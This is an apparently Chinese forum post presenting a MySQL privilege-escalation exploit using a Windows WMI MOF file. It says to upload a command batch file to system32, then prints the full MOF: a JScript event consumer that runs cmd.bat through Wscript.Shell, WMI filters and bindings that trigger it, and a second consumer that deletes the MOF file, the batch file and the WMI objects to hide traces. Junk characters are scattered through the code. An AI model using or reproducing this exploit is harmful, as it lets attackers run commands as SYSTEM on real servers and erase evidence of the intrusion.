Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
% x4 o5 F# [4 g1 G, _0 `需要将要运行的命令写入到bat上传到system32目录，然后执行。

这个sql提权MOF需要运行 system下的文件，不能定义路径。
0 g9 T* U# i9 T) u4 Z1 y需要将要运行的命令写入到bat上传到system32目录，然后执行。

; J! Q" t1 x7 x- y' H  M2 [2 P#pragma
+ ~3 H& ]* _% K1 A# j# N, R/ b                        namespace("\\\\.\\root\\cimv2")
                        class
1 I& T- R& o6 q                        MyClass547
                        {           [key]
                        string
6 g& P/ u( B. k2 Z                        Name;
, _6 N" j  o8 r                        };
                        class
                        ActiveScriptEventConsumer
. I" Q4 S! j% g9 @" }( e$ T                        : __EventConsumer {          [key]
                        string
3 J8 |5 J7 V& y1 s4 y, H- V9 g                        Name;           [not_null]
                        string
2 L+ f0 H3 X7 b3 |4 R, e4 X                        ScriptingEngine;           string
3 z  |/ |8 a% A                        ScriptFileName;           [template]
6 ]6 o* k  N0 E& E: o                        string
                        ScriptText;         uint32 KillTimeout;
; [2 n* e) I$ b* p- ]9 d: h                        }; instance of __Win32Provider as $P {
6 I* y4 X& P  |) n                        Name
                        =
' p: `# }; l% s& c                        "ActiveScriptEventConsumer";     CLSID =
* E* C( y6 j) M% V" s6 n                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
7 t7 T9 g7 d; ]0 k/ K                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
0 J$ o+ ]4 J  r! W                        =
4 w: |5 b. V$ a7 x5 g. T7 |                        {"ActiveScriptEventConsumer"};
$ z4 @* P5 e, m" d                        };
  h. ]9 k. I$ x, }: R! ~$ ?                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
5 X5 n0 B' h+ `- t                        =
# a6 p3 O+ |5 L% r  N* ~) C                        "ASEC";         ScriptingEngine
( M6 {8 n3 A! H! [$ z. A                        =
% Q# w) E' q% F8 n; W0 m% i( l: {$ a                        "JScript";         ScriptText
                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
" c9 y! l, c1 z& v, }                        =
' y+ h. v* K( F* i$ H7 ~                        "qndASEC";         ScriptingEngine
( q1 I- i% n" |3 s# m! o                        =
                        "JScript";         ScriptText
1 e: q. U- j; [; A+ G                        =
1 N" d, c; w( o                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
0 ], T  H4 A; i* L) n                        }; instance of __EventFilter as $Filt {         Name
+ T8 k' Q3 e9 ^                        =
4 P; E8 }% u+ ?( ]4 p; c                        "instfilt";         Query
) y& @5 {: Z% ^$ l! E3 B8 u                        =
) L  K4 V% E+ t8 `/ y  E                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
                        =
                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
# M; C2 l; E: z" _/ ?1 {                        =
3 Y2 }& n5 D, C: n                        "qndfilt";         Query
                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
& y/ O, y$ ~( l* l3 b1 e                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
                        = $cons;         Filter
                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
$ n; Q( s9 m3 A0 u, Y                        = $cons2;         Filter
                        = $Filt2;
# G( ?8 O( R3 F' G2 _& X                        }; instance of MyClass547
                        as $MyClass {         Name
( s9 Q" a+ W- x  B; t                        =
# V  x, M' @) @2 A                        "ClassConsumer";
                        };